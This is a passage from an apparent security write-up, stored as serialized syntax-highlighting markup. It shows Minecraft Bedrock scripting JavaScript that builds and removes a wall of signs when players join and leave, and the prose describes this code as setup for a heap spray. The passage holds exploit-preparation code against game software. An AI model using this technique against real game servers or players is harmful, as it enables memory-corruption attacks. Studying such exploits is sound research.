free",{"type":25,"tag":216,"props":154461,"children":154462},{"style":6964},[154463],{"type":31,"value":1850},{"type":25,"tag":216,"props":154465,"children":154466},{"style":6947},[154467],{"type":31,"value":154209},{"type":25,"tag":216,"props":154469,"children":154470},{"style":6964},[154471],{"type":31,"value":18761},{"type":25,"tag":216,"props":154473,"children":154474},{"class":6922,"line":7654},[154475,154479,154483,154487,154491,154495,154499,154503,154507,154511,154515,154519],{"type":25,"tag":216,"props":154476,"children":154477},{"style":6973},[154478],{"type":31,"value":16235},{"type":25,"tag":216,"props":154480,"children":154481},{"style":6964},[154482],{"type":31,"value":7016},{"type":25,"tag":216,"props":154484,"children":154485},{"style":6947},[154486],{"type":31,"value":154209},{"type":25,"tag":216,"props":154488,"children":154489},{"style":6953},[154490],{"type":31,"value":7232},{"type":25,"tag":216,"props":154492,"children":154493},{"style":6936},[154494],{"type":31,"value":43301},{"type":25,"tag":216,"props":154496,"children":154497},{"style":6953},[154498],{"type":31,"value":27654},{"type":25,"tag":216,"props":154500,"children":154501},{"style":6947},[154502],{"type":31,"value":154180},{"type":25,"tag":216,"props":154504,"children":154505},{"style":6964},[154506],{"type":31,"value":179},{"type":25,"tag":216,"props":154508,"children":154509},{"style":6947},[154510],{"type":31,"value":154218},{"type":25,"tag":216,"props":154512,"children":154513},{"style":6953},[154514],{"type":31,"value":7232},{"type":25,"tag":216,"props":154516,"children":154517},{"style":6936},[154518],{"type":31,"value":13012},{"type":25,"tag":216,"props":154520,"children":154521},{"style":6964},[154522],{"type":31,"value":18761},{"type":25,"tag":216,"props":154524,"children":154525},{"class":6922,"line":7722},[154526,154530],{"type":25,"tag":216,"props":154527,"children":154528},{"style":6973},[154529],{"type":31,"value":19702},{"type":25,"tag":216,"props":154531,"children":154532},{"style":6964},[154533],{"type":31,"value":6967},{"type":25,"tag":216,"props":154535,"children":154536},{"class":6922,"line":7730},[154537],{"type":25,"tag":216,"props":154538,"children":154539},{"style":6964},[154540],{"type":31,"value":7311},{"type":25,"tag":216,"props":154542,"children":154543},{"class":6922,"line":7760},[154544],{"type":25,"tag":216,"props":154545,"children":154546},{"emptyLinePlaceholder":16},[154547],{"type":31,"value":7642},{"type":25,"tag":216,"props":154549,"children":154550},{"class":6922,"line":7768},[154551,154556,154560,154564,154568,154572,154576,154581],{"type":25,"tag":216,"props":154552,"children":154553},{"style":6947},[154554],{"type":31,"value":154555},"    sign",{"type":25,"tag":216,"props":154557,"children":154558},{"style":6964},[154559],{"type":31,"value":179},{"type":25,"tag":216,"props":154561,"children":154562},{"style":6947},[154563],{"type":31,"value":154209},{"type":25,"tag":216,"props":154565,"children":154566},{"style":6964},[154567],{"type":31,"value":179},{"type":25,"tag":216,"props":154569,"children":154570},{"style":7047},[154571],{"type":31,"value":154289},{"type":25,"tag":216,"props":154573,"children":154574},{"style":6964},[154575],{"type":31,"value":1850},{"type":25,"tag":216,"props":154577,"children":154578},{"style":8205},[154579],{"type":31,"value":154580},"\"\"",{"type":25,"tag":216,"props":154582,"children":154583},{"style":6964},[154584],{"type":31,"value":7797},{"type":25,"tag":216,"props":154586,"children":154587},{"class":6922,"line":7800},[154588,154592,154596,154600,154604,154608],{"type":25,"tag":216,"props":154589,"children":154590},{"style":6947},[154591],{"type":31,"value":154555},{"type":25,"tag":216,"props":154593,"children":154594},{"style":6964},[154595],{"type":31,"value":179},{"type":25,"tag":216,"props":154597,"children":154598},{"style":6947},[154599],{"type":31,"value":154218},{"type":25,"tag":216,"props":154601,"children":154602},{"style":6953},[154603],{"type":31,"value":6956},{"type":25,"tag":216,"props":154605,"children":154606},{"style":6936},[154607],{"type":31,"value":13012},{"type":25,"tag":216,"props":154609,"children":154610},{"style":6964},[154611],{"type":31,"value":6967},{"type":25,"tag":216,"props":154613,"children":154614},{"class":6922,"line":7808},[154615],{"type":25,"tag":216,"props":154616,"children":154617},{"emptyLinePlaceholder":16},[154618],{"type":31,"value":7642},{"type":25,"tag":216,"props":154620,"children":154621},{"class":6922,"line":7868},[154622,154626,154630,154635,154639,154644],{"type":25,"tag":216,"props":154623,"children":154624},{"style":6947},[154625],{"type":31,"value":154555},{"type":25,"tag":216,"props":154627,"children":154628},{"style":6964},[154629],{"type":31,"value":179},{"type":25,"tag":216,"props":154631,"children":154632},{"style":6947},[154633],{"type":31,"value":154634},"block",{"type":25,"tag":216,"props":154636,"children":154637},{"style":6964},[154638],{"type":31,"value":179},{"type":25,"tag":216,"props":154640,"children":154641},{"style":7047},[154642],{"type":31,"value":154643},"setPermutation",{"type":25,"tag":216,"props":154645,"children":154646},{"style":6964},[154647],{"type":31,"value":7420},{"type":25,"tag":216,"props":154649,"children":154650},{"class":6922,"line":13001},[154651,154656,154660,154665,154669,154674],{"type":25,"tag":216,"props":154652,"children":154653},{"style":6947},[154654],{"type":31,"value":154655},"        BlockPermutation",{"type":25,"tag":216,"props":154657,"children":154658},{"style":6964},[154659],{"type":31,"value":179},{"type":25,"tag":216,"props":154661,"children":154662},{"style":7047},[154663],{"type":31,"value":154664},"resolve",{"type":25,"tag":216,"props":154666,"children":154667},{"style":6964},[154668],{"type":31,"value":1850},{"type":25,"tag":216,"props":154670,"children":154671},{"style":8205},[154672],{"type":31,"value":154673},"\"minecraft:air\"",{"type":25,"tag":216,"props":154675,"children":154676},{"style":6964},[154677],{"type":31,"value":7107},{"type":25,"tag":216,"props":154679,"children":154680},{"class":6922,"line":13019},[154681],{"type":25,"tag":216,"props":154682,"children":154683},{"style":6964},[154684],{"type":31,"value":47623},{"type":25,"tag":216,"props":154686,"children":154687},{"class":6922,"line":13064},[154688,154692,154696,154700,154704,154708],{"type":25,"tag":216,"props":154689,"children":154690},{"style":6947},[154691],{"type":31,"value":154555},{"type":25,"tag":216,"props":154693,"children":154694},{"style":6964},[154695],{"type":31,"value":179},{"type":25,"tag":216,"props":154697,"children":154698},{"style":6947},[154699],{"type":31,"value":136897},{"type":25,"tag":216,"props":154701,"children":154702},{"style":6953},[154703],{"type":31,"value":6956},{"type":25,"tag":216,"props":154705,"children":154706},{"style":6936},[154707],{"type":31,"value":16425},{"type":25,"tag":216,"props":154709,"children":154710},{"style":6964},[154711],{"type":31,"value":6967},{"type":25,"tag":216,"props":154713,"children":154714},{"class":6922,"line":13170},[154715],{"type":25,"tag":216,"props":154716,"children":154717},{"style":6964},[154718],{"type":31,"value":7874},{"type":25,"tag":38,"props":154720,"children":154721},{},[154722,154724,154730],{"type":31,"value":154723},"These functions will be used to perform the heap spray. Before that, we need to populate the ",{"type":25,"tag":82,"props":154725,"children":154727},{"className":154726},[],[154728],{"type":31,"value":154729},"signs",{"type":31,"value":154731}," array. For this, we generate a wall of signs when a player joins, and remove it after they leave:",{"type":25,"tag":206,"props":154733,"children":154735},{"code":154734,"language":39578,"meta":7,"className":39576,"style":7},"let signs;\n\nfunction create_wall() {\n    signs = [];\n\n    for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n        for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n\n            [...]\n            \n            const sign_block = world\n                .getDimension(\"overworld\")\n                .getBlock(sign_location);\n            sign_block.setPermutation(\n                BlockPermutation.resolve(\"minecraft:wall_sign\", {\n                    facing_direction: 3\n                }\n            ));\n            let sign_component = sign_block\n                .getComponent(BlockComponentTypes.Sign);\n\n            signs.push({\n                sign: sign_component,\n                allocated: false,\n                block: sign_block,\n                removed: false\n            });\n        }\n    }\n}\n\nfunction remove_wall() {\n    signs = [];\n    \n    for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n        for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n            \n            [...]\n             \n            const sign_block = await wait_for_block(\n                world.getDimension(\"overworld\"),\n                sign_location\n            );\n            sign_block.setPermutation(\n                BlockPermutation.resolve(\"minecraft:air\")\n            );\n\n            [...]\n        }\n    }\n}\n\nworld.afterEvents.playerSpawn.subscribe((arg) => {\n    create_wall();\n});\n\nworld.beforeEvents.playerLeave.subscribe(async (arg) => {\n    remove_wall();\n});\n",[154736],{"type":25,"tag":82,"props":154737,"children":154738},{"__ignoreMap":7},[154739,154754,154761,154777,154794,154801,154863,154925,154932,154948,154956,154978,155004,155029,155049,155078,155090,155097,155105,155127,155161,155168,155188,155204,155220,155236,155248,155256,155263,155270,155277,155284,155300,155315,155322,155381,155440,155447,155462,155470,155498,155526,155534,155541,155560,155587,155594,155601,155616,155623,155630,155637,155644,155700,155712,155719,155726,155787,155799],{"type":25,"tag":216,"props":154740,"children":154741},{"class":6922,"line":6923},[154742,154746,154750],{"type":25,"tag":216,"props":154743,"children":154744},{"style":6936},[154745],{"type":31,"value":15743},{"type":25,"tag":216,"props":154747,"children":154748},{"style":6947},[154749],{"type":31,"value":154189},{"type":25,"tag":216,"props":154751,"children":154752},{"style":6964},[154753],{"type":31,"value":6967},{"type":25,"tag":216,"props":154755,"children":154756},{"class":6922,"line":6769},[154757],{"type":25,"tag":216,"props":154758,"children":154759},{"emptyLinePlaceholder":16},[154760],{"type":31,"value":7642},{"type":25,"tag":216,"props":154762,"children":154763},{"class":6922,"line":6778},[154764,154768,154773],{"type":25,"tag":216,"props":154765,"children":154766},{"style":6936},[154767],{"type":31,"value":35339},{"type":25,"tag":216,"props":154769,"children":154770},{"style":7047},[154771],{"type":31,"value":154772}," create_wall",{"type":25,"tag":216,"props":154774,"children":154775},{"style":6964},[154776],{"type":31,"value":19694},{"type":25,"tag":216,"props":154778,"children":154779},{"class":6922,"line":7005},[154780,154785,154789],{"type":25,"tag":216,"props":154781,"children":154782},{"style":6947},[154783],{"type":31,"value":154784},"    signs",{"type":25,"tag":216,"props":154786,"children":154787},{"style":6953},[154788],{"type":31,"value":6956},{"type":25,"tag":216,"props":154790,"children":154791},{"style":6964},[154792],{"type":31,"value":154793}," [];\n",{"type":25,"tag":216,"props":154795,"children":154796},{"class":6922,"line":7110},[154797],{"type":25,"tag":216,"props":154798,"children":154799},{"emptyLinePlaceholder":16},[154800],{"type":31,"value":7642},{"type":25,"tag":216,"props":154802,"children":154803},{"class":6922,"line":7216},[154804,154808,154812,154816,154821,154825,154829,154833,154838,154842,154847,154851,154855,154859],{"type":25,"tag":216,"props":154805,"children":154806},{"style":6973},[154807],{"type":31,"value":6976},{"type":25,"tag":216,"props":154809,"children":154810},{"style":6964},[154811],{"type":31,"value":7016},{"type":25,"tag":216,"props":154813,"children":154814},{"style":6936},[154815],{"type":31,"value":15743},{"type":25,"tag":216,"props":154817,"children":154818},{"style":6947},[154819],{"type":31,"value":154820}," current_y",{"type":25,"tag":216,"props":154822,"children":154823},{"style":6953},[154824],{"type":31,"value":6956},{"type":25,"tag":216,"props":154826,"children":154827},{"style":6989},[154828],{"type":31,"value":6992},{"type":25,"tag":216,"props":154830,"children":154831},{"style":6964},[154832],{"type":31,"value":21184},{"type":25,"tag":216,"props":154834,"children":154835},{"style":6947},[154836],{"type":31,"value":154837},"current_y",{"type":25,"tag":216,"props":154839,"children":154840},{"style":6953},[154841],{"type":31,"value":12672},{"type":25,"tag":216,"props":154843,"children":154844},{"style":6947},[154845],{"type":31,"value":154846}," WALL_HEIGHT",{"type":25,"tag":216,"props":154848,"children":154849},{"style":6964},[154850],{"type":31,"value":21184},{"type":25,"tag":216,"props":154852,"children":154853},{"style":6947},[154854],{"type":31,"value":154837},{"type":25,"tag":216,"props":154856,"children":154857},{"style":6953},[154858],{"type":31,"value":55238},{"type":25,"tag":216,"props":154860,"children":154861},{"style":6964},[154862],{"type":31,"value":18761},{"type":25,"tag":216,"props":154864,"children":154865},{"class":6922,"line":7244},[154866,154870,154874,154878,154883,154887,154891,154895,154900,154904,154909,154913,154917,154921],{"type":25,"tag":216,"props":154867,"children":154868},{"style":6973},[154869],{"type":31,"value":64544},{"type":25,"tag":216,"props":154871,"children":154872},{"style":6964},[154873],{"type":31,"value":7016},{"type":25,"tag":216,"props":154875,"children":154876},{"style":6936},[154877],{"type":31,"value":15743},{"type":25,"tag":216,"props":154879,"children":154880},{"style":6947},[154881],{"type":31,"value":154882}," current_x",{"type":25,"tag":216,"props":154884,"children":154885},{"style":6953},[154886],{"type":31,"value":6956},{"type":25,"tag":216,"props":154888,"children":154889},{"style":6989},[154890],{"type":31,"value":6992},{"type":25,"tag":216,"props":154892,"children":154893},{"style":6964},[154894],{"type":31,"value":21184},{"type":25,"tag":216,"props":154896,"children":154897},{"style":6947},[154898],{"type":31,"value":154899},"current_x",{"type":25,"tag":216,"props":154901,"children":154902},{"style":6953},[154903],{"type":31,"value":12672},{"type":25,"tag":216,"props":154905,"children":154906},{"style":6947},[154907],{"type":31,"value":154908}," WALL_WIDTH",{"type":25,"tag":216,"props":154910,"children":154911},{"style":6964},[154912],{"type":31,"value":21184},{"type":25,"tag":216,"props":154914,"children":154915},{"style":6947},[154916],{"type":31,"value":154899},{"type":25,"tag":216,"props":154918,"children":154919},{"style":6953},[154920],{"type":31,"value":55238},{"type":25,"tag":216,"props":154922,"children":154923},{"style":6964},[154924],{"type":31,"value":18761},{"type":25,"tag":216,"props":154926,"children":154927},{"class":6922,"line":7257},[154928],{"type":25,"tag":216,"props":154929,"children":154930},{"emptyLinePlaceholder":16},[154931],{"type":31,"value":7642},{"type":25,"tag":216,"props":154933,"children":154934},{"class":6922,"line":7275},[154935,154940,154944],{"type":25,"tag":216,"props":154936,"children":154937},{"style":6964},[154938],{"type":31,"value":154939},"            [",{"type":25,"tag":216,"props":154941,"children":154942},{"style":6953},[154943],{"type":31,"value":13547},{"type":25,"tag":216,"props":154945,"children":154946},{"style":6964},[154947],{"type":31,"value":15728},{"type":25,"tag":216,"props":154949,"children":154950},{"class":6922,"line":7296},[154951],{"type":25,"tag":216,"props":154952,"children":154953},{"style":6964},[154954],{"type":31,"value":154955},"            \n",{"type":25,"tag":216,"props":154957,"children":154958},{"class":6922,"line":7305},[154959,154964,154969,154973],{"type":25,"tag":216,"props":154960,"children":154961},{"style":6936},[154962],{"type":31,"value":154963},"            const",{"type":25,"tag":216,"props":154965,"children":154966},{"style":6947},[154967],{"type":31,"value":154968}," sign_block",{"type":25,"tag":216,"props":154970,"children":154971},{"style":6953},[154972],{"type":31,"value":6956},{"type":25,"tag":216,"props":154974,"children":154975},{"style":6947},[154976],{"type":31,"value":154977}," world\n",{"type":25,"tag":216,"props":154979,"children":154980},{"class":6922,"line":7557},[154981,154986,154991,154995,155000],{"type":25,"tag":216,"props":154982,"children":154983},{"style":6964},[154984],{"type":31,"value":154985},"                .",{"type":25,"tag":216,"props":154987,"children":154988},{"style":7047},[154989],{"type":31,"value":154990},"getDimension",{"type":25,"tag":216,"props":154992,"children":154993},{"style":6964},[154994],{"type":31,"value":1850},{"type":25,"tag":216,"props":154996,"children":154997},{"style":8205},[154998],{"type":31,"value":154999},"\"overworld\"",{"type":25,"tag":216,"props":155001,"children":155002},{"style":6964},[155003],{"type":31,"value":7107},{"type":25,"tag":216,"props":155005,"children":155006},{"class":6922,"line":7574},[155007,155011,155016,155020,155025],{"type":25,"tag":216,"props":155008,"children":155009},{"style":6964},[155010],{"type":31,"value":154985},{"type":25,"tag":216,"props":155012,"children":155013},{"style":7047},[155014],{"type":31,"value":155015},"getBlock",{"type":25,"tag":216,"props":155017,"children":155018},{"style":6964},[155019],{"type":31,"value":1850},{"type":25,"tag":216,"props":155021,"children":155022},{"style":6947},[155023],{"type":31,"value":155024},"sign_location",{"type":25,"tag":216,"props":155026,"children":155027},{"style":6964},[155028],{"type":31,"value":7797},{"type":25,"tag":216,"props":155030,"children":155031},{"class":6922,"line":7591},[155032,155037,155041,155045],{"type":25,"tag":216,"props":155033,"children":155034},{"style":6947},[155035],{"type":31,"value":155036},"            sign_block",{"type":25,"tag":216,"props":155038,"children":155039},{"style":6964},[155040],{"type":31,"value":179},{"type":25,"tag":216,"props":155042,"children":155043},{"style":7047},[155044],{"type":31,"value":154643},{"type":25,"tag":216,"props":155046,"children":155047},{"style":6964},[155048],{"type":31,"value":7420},{"type":25,"tag":216,"props":155050,"children":155051},{"class":6922,"line":7604},[155052,155057,155061,155065,155069,155074],{"type":25,"tag":216,"props":155053,"children":155054},{"style":6947},[155055],{"type":31,"value":155056},"                BlockPermutation",{"type":25,"tag":216,"props":155058,"children":155059},{"style":6964},[155060],{"type":31,"value":179},{"type":25,"tag":216,"props":155062,"children":155063},{"style":7047},[155064],{"type":31,"value":154664},{"type":25,"tag":216,"props":155066,"children":155067},{"style":6964},[155068],{"type":31,"value":1850},{"type":25,"tag":216,"props":155070,"children":155071},{"style":8205},[155072],{"type":31,"value":155073},"\"minecraft:wall_sign\"",{"type":25,"tag":216,"props":155075,"children":155076},{"style":6964},[155077],{"type":31,"value":52851},{"type":25,"tag":216,"props":155079,"children":155080},{"class":6922,"line":7613},[155081,155086],{"type":25,"tag":216,"props":155082,"children":155083},{"style":6947},[155084],{"type":31,"value":155085},"                    facing_direction:",{"type":25,"tag":216,"props":155087,"children":155088},{"style":6989},[155089],{"type":31,"value":23286},{"type":25,"tag":216,"props":155091,"children":155092},{"class":6922,"line":7636},[155093],{"type":25,"tag":216,"props":155094,"children":155095},{"style":6964},[155096],{"type":31,"value":75041},{"type":25,"tag":216,"props":155098,"children":155099},{"class":6922,"line":7645},[155100],{"type":25,"tag":216,"props":155101,"children":155102},{"style":6964},[155103],{"type":31,"value":155104},"            ));\n",{"type":25,"tag":216,"props":155106,"children":155107},{"class":6922,"line":7654},[155108,155113,155118,155122],{"type":25,"tag":216,"props":155109,"children":155110},{"style":6936},[155111],{"type":31,"value":155112},"            let",{"type":25,"tag":216,"props":155114,"children":155115},{"style":6947},[155116],{"type":31,"value":155117}," sign_component",{"type":25,"tag":216,"props":155119,"children":155120},{"style":6953},[155121],{"type":31,"value":6956},{"type":25,"tag":216,"props":155123,"children":155124},{"style":6947},[155125],{"type":31,"value":155126}," sign_block\n",{"type":25,"tag":216,"props":155128,"children":155129},{"class":6922,"line":7722},[155130,155134,155139,155143,155148,155152,155157],{"type":25,"tag":216,"props":155131,"children":155132},{"style":6964},[155133],{"type":31,"value":154985},{"type":25,"tag":216,"props":155135,"children":155136},{"style":7047},[155137],{"type":31,"value":155138},"getComponent",{"type":25,"tag":216,"props":155140,"children":155141},{"style":6964},[155142],{"type":31,"value":1850},{"type":25,"tag":216,"props":155144,"children":155145},{"style":6947},[155146],{"type":31,"value":155147},"BlockComponentTypes",{"type":25,"tag":216,"props":155149,"children":155150},{"style":6964},[155151],{"type":31,"value":179},{"type":25,"tag":216,"props":155153,"children":155154},{"style":6947},[155155],{"type":31,"value":155156},"Sign",{"type":25,"tag":216,"props":155158,"children":155159},{"style":6964},[155160],{"type":31,"value":7797},{"type":25,"tag":216,"props":155162,"children":155163},{"class":6922,"line":7730},[155164],{"type":25,"tag":216,"props":155165,"children":155166},{"emptyLinePlaceholder":16},[155167],{"type":31,"value":7642},{"type":25,"tag":216,"props":155169,"children":155170},{"class":6922,"line":7760},[155171,155176,155180,155184],{"type":25,"tag":216,"props":155172,"children":155173},{"style":6947},[155174],{"type":31,"value":155175},"            signs",{"type":25,"tag":216,"props":155177,"children":155178},{"style":6964},[155179],{"type":31,"value":179},{"type":25,"tag":216,"props":155181,"children":155182},{"style":7047},[155183],{"type":31,"value":7783},{"type":25,"tag":216,"props":155185,"children":155186},{"style":6964},[155187],{"type":31,"value":19098},{"type":25,"tag":216,"props":155189,"children":155190},{"class":6922,"line":7768},[155191,155196,155200],{"type":25,"tag":216,"props":155192,"children":155193},{"style":6947},[155194],{"type":31,"value":155195},"                sign:",{"type":25,"tag":216,"props":155197,"children":155198},{"style":6947},[155199],{"type":31,"value":155117},{"type":25,"tag":216,"props":155201,"children":155202},{"style":6964},[155203],{"type":31,"value":7465},{"type":25,"tag":216,"props":155205,"children":155206},{"class":6922,"line":7800},[155207,155212,155216],{"type":25,"tag":216,"props":155208,"children":155209},{"style":6947},[155210],{"type":31,"value":155211},"                allocated:",{"type":25,"tag":216,"props":155213,"children":155214},{"style":6936},[155215],{"type":31,"value":13012},{"type":25,"tag":216,"props":155217,"children":155218},{"style":6964},[155219],{"type":31,"value":7465},{"type":25,"tag":216,"props":155221,"children":155222},{"class":6922,"line":7808},[155223,155228,155232],{"type":25,"tag":216,"props":155224,"children":155225},{"style":6947},[155226],{"type":31,"value":155227},"                block:",{"type":25,"tag":216,"props":155229,"children":155230},{"style":6947},[155231],{"type":31,"value":154968},{"type":25,"tag":216,"props":155233,"children":155234},{"style":6964},[155235],{"type":31,"value":7465},{"type":25,"tag":216,"props":155237,"children":155238},{"class":6922,"line":7868},[155239,155244],{"type":25,"tag":216,"props":155240,"children":155241},{"style":6947},[155242],{"type":31,"value":155243},"                removed:",{"type":25,"tag":216,"props":155245,"children":155246},{"style":6936},[155247],{"type":31,"value":16267},{"type":25,"tag":216,"props":155249,"children":155250},{"class":6922,"line":13001},[155251],{"type":25,"tag":216,"props":155252,"children":155253},{"style":6964},[155254],{"type":31,"value":155255},"            });\n",{"type":25,"tag":216,"props":155257,"children":155258},{"class":6922,"line":13019},[155259],{"type":25,"tag":216,"props":155260,"children":155261},{"style":6964},[155262],{"type":31,"value":7302},{"type":25,"tag":216,"props":155264,"children":155265},{"class":6922,"line":13064},[155266],{"type":25,"tag":216,"props":155267,"children":155268},{"style":6964},[155269],{"type":31,"value":7311},{"type":25,"tag":216,"props":155271,"children":155272},{"class":6922,"line":13170},[155273],{"type":25,"tag":216,"props":155274,"children":155275},{"style":6964},[155276],{"type":31,"value":7874},{"type":25,"tag":216,"props":155278,"children":155279},{"class":6922,"line":27455},[155280],{"type":25,"tag":216,"props":155281,"children":155282},{"emptyLinePlaceholder":16},[155283],{"type":31,"value":7642},{"type":25,"tag":216,"props":155285,"children":155286},{"class":6922,"line":27490},[155287,155291,155296],{"type":25,"tag":216,"props":155288,"children":155289},{"style":6936},[155290],{"type":31,"value":35339},{"type":25,"tag":216,"props":155292,"children":155293},{"style":7047},[155294],{"type":31,"value":155295}," remove_wall",{"type":25,"tag":216,"props":155297,"children":155298},{"style":6964},[155299],{"type":31,"value":19694},{"type":25,"tag":216,"props":155301,"children":155302},{"class":6922,"line":27498},[155303,155307,155311],{"type":25,"tag":216,"props":155304,"children":155305},{"style":6947},[155306],{"type":31,"value":154784},{"type":25,"tag":216,"props":155308,"children":155309},{"style":6953},[155310],{"type":31,"value":6956},{"type":25,"tag":216,"props":155312,"children":155313},{"style":6964},[155314],{"type":31,"value":154793},{"type":25,"tag":216,"props":155316,"children":155317},{"class":6922,"line":27506},[155318],{"type":25,"tag":216,"props":155319,"children":155320},{"style":6964},[155321],{"type":31,"value":65754},{"type":25,"tag":216,"props":155323,"children":155324},{"class":6922,"line":27515},[155325,155329,155333,155337,155341,155345,155349,155353,155357,155361,155365,155369,155373,155377],{"type":25,"tag":216,"props":155326,"children":155327},{"style":6973},[155328],{"type":31,"value":6976},{"type":25,"tag":216,"props":155330,"children":155331},{"style":6964},[155332],{"type":31,"value":7016},{"type":25,"tag":216,"props":155334,"children":155335},{"style":6936},[155336],{"type":31,"value":15743},{"type":25,"tag":216,"props":155338,"children":155339},{"style":6947},[155340],{"type":31,"value":154820},{"type":25,"tag":216,"props":155342,"children":155343},{"style":6953},[155344],{"type":31,"value":6956},{"type":25,"tag":216,"props":155346,"children":155347},{"style":6989},[155348],{"type":31,"value":6992},{"type":25,"tag":216,"props":155350,"children":155351},{"style":6964},[155352],{"type":31,"value":21184},{"type":25,"tag":216,"props":155354,"children":155355},{"style":6947},[155356],{"type":31,"value":154837},{"type":25,"tag":216,"props":155358,"children":155359},{"style":6953},[155360],{"type":31,"value":12672},{"type":25,"tag":216,"props":155362,"children":155363},{"style":6947},[155364],{"type":31,"value":154846},{"type":25,"tag":216,"props":155366,"children":155367},{"style":6964},[155368],{"type":31,"value":21184},{"type":25,"tag":216,"props":155370,"children":155371},{"style":6947},[155372],{"type":31,"value":154837},{"type":25,"tag":216,"props":155374,"children":155375},{"style":6953},[155376],{"type":31,"value":55238},{"type":25,"tag":216,"props":155378,"children":155379},{"style":6964},[155380],{"type":31,"value":18761},{"type":25,"tag":216,"props":155382,"children":155383},{"class":6922,"line":27557},[155384,155388,155392,155396,155400,155404,155408,155412,155416,155420,155424,155428,155432,155436],{"type":25,"tag":216,"props":155385,"children":155386},{"style":6973},[155387],{"type":31,"value":64544},{"type":25,"tag":216,"props":155389,"children":155390},{"style":6964},[155391],{"type":31,"value":7016},{"type":25,"tag":216,"props":155393,"children":155394},{"style":6936},[155395],{"type":31,"value":15743},{"type":25,"tag":216,"props":155397,"children":155398},{"style":6947},[155399],{"type":31,"value":154882},{"type":25,"tag":216,"props":155401,"children":155402},{"style":6953},[155403],{"type":31,"value":6956},{"type":25,"tag":216,"props":155405,"children":155406},{"style":6989},[155407],{"type":31,"value":6992},{"type":25,"tag":216,"props":155409,"children":155410},{"style":6964},[155411],{"type":31,"value":21184},{"type":25,"tag":216,"props":155413,"children":155414},{"style":6947},[155415],{"type":31,"value":154899},{"type":25,"tag":216,"props":155417,"children":155418},{"style":6953},[155419],{"type":31,"value":12672},{"type":25,"tag":216,"props":155421,"children":155422},{"style":6947},[155423],{"type":31,"value":154908},{"type":25,"tag":216,"props":155425,"children":155426},{"style":6964},[155427],{"type":31,"value":21184},{"type":25,"tag":216,"props":155429,"children":155430},{"style":6947},[155431],{"type":31,"value":154899},{"type":25,"tag":216,"props":155433,"children":155434},{"style":6953},[155435],{"type":31,"value":55238},{"type":25,"tag":216,"props":155437,"children":155438},{"style":6964},[155439],{"type":31,"value":18761},{"type":25,"tag":216,"props":155441,"children":155442},{"class":6922,"line":27590},[155443],{"type":25,"tag":216,"props":155444,"children":155445},{"style":6964},[155446],{"type":31,"value":154955},{"type":25,"tag":216,"props":155448,"children":155449},{"class":6922,"line":27598},[155450,155454,155458],{"type":25,"tag":216,"props":155451,"children":155452},{"style":6964},[155453],{"type":31,"value":154939},{"type":25,"tag":216,"props":155455,"children":155456},{"style":6953},[155457],{"type":31,"value":13547},{"type":25,"tag":216,"props":155459,"children":155460},{"style":6964},[155461],{"type":31,"value":15728},{"type":25,"tag":216,"props":155463,"children":155464},{"class":6922,"line":27606},[155465],{"type":25,"tag":216,"props":155466,"children":155467},{"style":6964},[155468],{"type":31,"value":155469},"             \n",{"type":25,"tag":216,"props":155471,"children":155472},{"class":6922,"line":27615},[155473,155477,155481,155485,155489,155494],{"type":25,"tag":216,"props":155474,"children":155475},{"style":6936},[155476],{"type":31,"value":154963},{"type":25,"tag":216,"props":155478,"children":155479},{"style":6947},[155480],{"type":31,"value":154968},{"type":25,"tag":216,"props":155482,"children":155483},{"style":6953},[155484],{"type":31,"value":6956},{"type":25,"tag":216,"props":155486,"children":155487},{"style":6973},[155488],{"type":31,"value":40174},{"type":25,"tag":216,"props":155490,"children":155491},{"style":7047},[155492],{"type":31,"value":155493}," wait_for_block",{"type":25,"tag":216,"props":155495,"children":155496},{"style":6964},[155497],{"type":31,"value":7420},{"type":25,"tag":216,"props":155499,"children":155500},{"class":6922,"line":27691},[155501,155506,155510,155514,155518,155522],{"type":25,"tag":216,"props":155502,"children":155503},{"style":6947},[155504],{"type":31,"value":155505},"                world",{"type":25,"tag":216,"props":155507,"children":155508},{"style":6964},[155509],{"type":31,"value":179},{"type":25,"tag":216,"props":155511,"children":155512},{"style":7047},[155513],{"type":31,"value":154990},{"type":25,"tag":216,"props":155515,"children":155516},{"style":6964},[155517],{"type":31,"value":1850},{"type":25,"tag":216,"props":155519,"children":155520},{"style":8205},[155521],{"type":31,"value":154999},{"type":25,"tag":216,"props":155523,"children":155524},{"style":6964},[155525],{"type":31,"value":10688},{"type":25,"tag":216,"props":155527,"children":155528},{"class":6922,"line":27724},[155529],{"type":25,"tag":216,"props":155530,"children":155531},{"style":6947},[155532],{"type":31,"value":155533},"                sign_location\n",{"type":25,"tag":216,"props":155535,"children":155536},{"class":6922,"line":27732},[155537],{"type":25,"tag":216,"props":155538,"children":155539},{"style":6964},[155540],{"type":31,"value":129046},{"type":25,"tag":216,"props":155542,"children":155543},{"class":6922,"line":27740},[155544,155548,155552,155556],{"type":25,"tag":216,"props":155545,"children":155546},{"style":6947},[155547],{"type":31,"value":155036},{"type":25,"tag":216,"props":155549,"children":155550},{"style":6964},[155551],{"type":31,"value":179},{"type":25,"tag":216,"props":155553,"children":155554},{"style":7047},[155555],{"type":31,"value":154643},{"type":25,"tag":216,"props":155557,"children":155558},{"style":6964},[155559],{"type":31,"value":7420},{"type":25,"tag":216,"props":155561,"children":155562},{"class":6922,"line":27777},[155563,155567,155571,155575,155579,155583],{"type":25,"tag":216,"props":155564,"children":155565},{"style":6947},[155566],{"type":31,"value":155056},{"type":25,"tag":216,"props":155568,"children":155569},{"style":6964},[155570],{"type":31,"value":179},{"type":25,"tag":216,"props":155572,"children":155573},{"style":7047},[155574],{"type":31,"value":154664},{"type":25,"tag":216,"props":155576,"children":155577},{"style":6964},[155578],{"type":31,"value":1850},{"type":25,"tag":216,"props":155580,"children":155581},{"style":8205},[155582],{"type":31,"value":154673},{"type":25,"tag":216,"props":155584,"children":155585},{"style":6964},[155586],{"type":31,"value":7107},{"type":25,"tag":216,"props":155588,"children":155589},{"class":6922,"line":27790},[155590],{"type":25,"tag":216,"props":155591,"children":155592},{"style":6964},[155593],{"type":31,"value":129046},{"type":25,"tag":216,"props":155595,"children":155596},{"class":6922,"line":27803},[155597],{"type":25,"tag":216,"props":155598,"children":155599},{"emptyLinePlaceholder":16},[155600],{"type":31,"value":7642},{"type":25,"tag":216,"props":155602,"children":155603},{"class":6922,"line":27816},[155604,155608,155612],{"type":25,"tag":216,"props":155605,"children":155606},{"style":6964},[155607],{"type":31,"value":154939},{"type":25,"tag":216,"props":155609,"children":155610},{"style":